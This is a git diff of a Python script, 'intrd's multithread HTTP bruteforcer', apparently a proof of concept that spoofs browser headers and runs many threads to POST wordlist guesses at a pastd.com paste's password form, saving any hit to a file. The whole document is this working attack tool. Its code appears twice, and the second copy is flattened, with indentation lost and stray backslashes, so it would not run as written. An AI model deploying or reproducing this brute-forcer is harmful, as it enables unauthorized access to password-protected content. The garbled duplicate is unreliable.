intrd · March 8, 2017 18:38
diff --git a/int_httpbruteforcer.py b/int_httpbruteforcer.py
 # This tool is deprecated, please use https://github.com/intrd/nozzlr

 #!/usr/bin/env python
 ## intrd's multithread HTTP bruteforcer v1.1 (PoC bruteforcing pastd.com)
 # @author intrd - http://dann.com.br/ 
 # @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

 import sys,Queue,threading,hashlib,os,socket,time
 from subprocess import Popen, PIPE, STDOUT
 import urllib, shutil, json
 import requests
 from random import randint

 NumOfThreads=20 #dont thread too much
 queue = Queue.Queue()

 target="http://pastd.com/9f20df16" #my test, passwd=123 (attention to postdata id)
 cookie="PHPSESSID=yourphpsessid"
 resum=0

 WordList = open("../../LIBS/common_int_v3.txt",'r')

 class checkHash(threading.Thread):
 	def __init__(self,queue):
 		threading.Thread.__init__(self)
 		self.queue=queue

 	def run(self):
 		i=0
 		retry=False
 		while True:
 			if not retry:
 				try:
 					self.clear=self.queue.get()
 				except:
 					print "*** WAIT, CLOSING THREAD!"
 					self.queue.task_done()
 				try: 
 					passtry = self.clear.strip()
 				except:
 					print "*** WAIT, CLOSING THREAD!"
 					self.queue.task_done()
 				passtry = passtry.split("|")
 				ind = passtry[0]
 				passtry = passtry[1]
 			print ind+"> tried "+passtry,
 			headers = {
 		        "Host": "pastd.com",
 		        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0",
 		        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
 		        "Accept-Language": "en-US,en;q=0.5",
 		        "Accept-Encoding": "gzip, deflate",
 		        "Referer": "http://pastd.com/4058459a",
 		        "Cookie": ""+cookie,
 		        "Connection": "close",
 		        "Content-Type": "application/x-www-form-urlencoded",
 		    }
 			postdata = {'password_9f20df16': passtry} 
 			r = requests.post(target, data=postdata, headers=headers)
 			if "Enter the correct password below" in r.content:
 				retry=False
 				print "wrong.."
 			else:
 				print str(i)+" FOUND: "+passtry
 				file = open("founds.txt", 'a')
 				file.write(passtry+"\n")
 				file.close()
 				self.queue.task_done()
 				os._exit(0)
 			i+=1
 			self.queue.task_done()
 			#os._exit(0) #debug

 for i in range(NumOfThreads):
    t=checkHash(queue)
    t.setDaemon(True)
    t.start()

 i=0
 for word in WordList.readlines():
 	if i >= resum: 
 		queue.put(str(i)+"|"+word.strip())
 	i+=1

 queue.join()
	# This tool is deprecated, please use https://github.com/intrd/nozzlr

	#!/usr/bin/env python
	## intrd's multithread HTTP bruteforcer v1.1 (PoC bruteforcing pastd.com)
	# @author intrd - http://dann.com.br/
	# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

	import sys,Queue,threading,hashlib,os,socket,time
	from subprocess import Popen, PIPE, STDOUT
	import urllib, shutil, json
	import requests
	from random import randint

	NumOfThreads=20 #dont thread too much
	queue = Queue.Queue()

	target="http://pastd.com/9f20df16" #my test, passwd=123 (attention to postdata id)
	cookie="PHPSESSID=yourphpsessid"
	resum=0

	WordList = open("../../LIBS/common_int_v3.txt",'r')

	class checkHash(threading.Thread):
	def __init__(self,queue):
	threading.Thread.__init__(self)
	self.queue=queue

	def run(self):
	i=0
	retry=False
	while True:
	if not retry:
	try:
	self.clear=self.queue.get()
	except:
	print "*** WAIT, CLOSING THREAD!"
	self.queue.task_done()
	try:
	passtry = self.clear.strip()
	except:
	print "*** WAIT, CLOSING THREAD!"
	self.queue.task_done()
	passtry = passtry.split("\|")
	ind = passtry[0]
	passtry = passtry[1]
	print ind+"> tried "+passtry,
	headers = {
	"Host": "pastd.com",
	"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0",
	"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8",
	"Accept-Language": "en-US,en;q=0.5",
	"Accept-Encoding": "gzip, deflate",
	"Referer": "http://pastd.com/4058459a",
	"Cookie": ""+cookie,
	"Connection": "close",
	"Content-Type": "application/x-www-form-urlencoded",
	}
	postdata = {'password_9f20df16': passtry}
	r = requests.post(target, data=postdata, headers=headers)
	if "Enter the correct password below" in r.content:
	retry=False
	print "wrong.."
	else:
	print str(i)+" FOUND: "+passtry
	file = open("founds.txt", 'a')
	file.write(passtry+"\n")
	file.close()
	self.queue.task_done()
	os._exit(0)
	i+=1
	self.queue.task_done()
	#os._exit(0) #debug

	for i in range(NumOfThreads):
	t=checkHash(queue)
	t.setDaemon(True)
	t.start()

	i=0
	for word in WordList.readlines():
	if i >= resum:
	queue.put(str(i)+"\|"+word.strip())
	i+=1

	queue.join()